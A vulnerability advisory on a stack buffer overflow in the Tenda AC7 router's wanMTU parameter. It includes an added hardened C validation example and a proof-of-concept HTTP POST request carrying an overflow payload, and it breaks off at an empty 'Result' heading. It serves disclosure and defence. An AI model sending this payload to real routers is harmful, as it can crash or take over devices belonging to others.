Vendor
Tenda
Product
AC7 Router
Firmware Version
V15.03.06.44 (and likely earlier versions)
Description
In Tenda AC7 routers running firmware version V15.03.06.44 (and likely earlier versions), the wanMTU parameter of the /goform/AdvSetMacMtuWan route is affected by a stack buffer overflow that can lead to remote arbitrary code execution.
The check_param_changed function obtains the user-controlled wanMTU parameter and copies it into a stack buffer using the unsafe strcpy function. Since strcpy does not validate or limit the length of the input data, an attacker can send an overly long wanMTU value to trigger a stack buffer overflow. This vulnerability allows attackers to perform denial-of-service attacks or remotely execute arbitrary code on the affected device.
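A hardened way to take the wanMTU value into a fixed-size buffer, shown as an added example; it is not Tenda's code and not part of the original advisory. The function name copy_wan_mtu, the 8-byte buffer and the 576 to 1500 range are assumptions, since the page does not give the real buffer size or the firmware's accepted range.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MTU_BUF_LEN 8   /* assumed size; the real stack buffer size is not on the page */
#define MTU_MIN 576     /* assumed policy bounds, not taken from the firmware */
#define MTU_MAX 1500

/* Pattern described above, kept as a comment only:
 *     char buf[N]; strcpy(buf, wanMTU);    (source length never checked) */

/* Hardened copy: returns 0 and fills dst on success, -1 (dst emptied) on rejection. */
int copy_wan_mtu(char *dst, size_t dst_len, const char *wan_mtu)
{
    char *end = NULL;
    size_t digits;
    long value;

    if (dst == NULL || dst_len == 0 || wan_mtu == NULL)
        return -1;
    dst[0] = '\0';

    digits = strspn(wan_mtu, "0123456789");     /* length of the leading digit run */
    if (digits == 0 || wan_mtu[digits] != '\0')
        return -1;                              /* empty, or contains a non-digit */
    if (digits >= dst_len)
        return -1;                              /* would not fit together with the NUL */

    errno = 0;
    value = strtol(wan_mtu, &end, 10);
    if (errno != 0 || *end != '\0' || value < MTU_MIN || value > MTU_MAX)
        return -1;                              /* outside the allowed MTU range */

    memcpy(dst, wan_mtu, digits + 1);           /* length already proven to fit */
    return 0;
}

int main(void)
{
    char buf[MTU_BUF_LEN];
    /* Constructed sample inputs, including an over-long value like the one in the PoC. */
    const char *samples[] = { "1500", "1492", "99999", "1AAAAAAAAAAAAAAAAAAAAAAAA", "" };

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-28s -> %s\n", samples[i],
               copy_wan_mtu(buf, sizeof buf, samples[i]) == 0 ? "accepted" : "rejected");
    return 0;
}
```

Rejecting the value before any copy, rather than truncating it, also gives the web handler a clear point at which to log the malformed request.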


PoC
POST /goform/AdvSetMacMtuWan HTTP/1.1
Host: 192.168.0.1
Content-Length: 712
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Origin: http://192.168.0.1
Referer: http://192.168.0.1/mac_clone.html?random=0.6216016377171282&
Accept-Encoding: gzip, deflate, br
Cookie: password=pmp1qw
Connection: keep-alive

wanMTU=1AAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&wanSpeed=0&cloneType=0&mac=B4:0F:3B:2E:64:19
Result
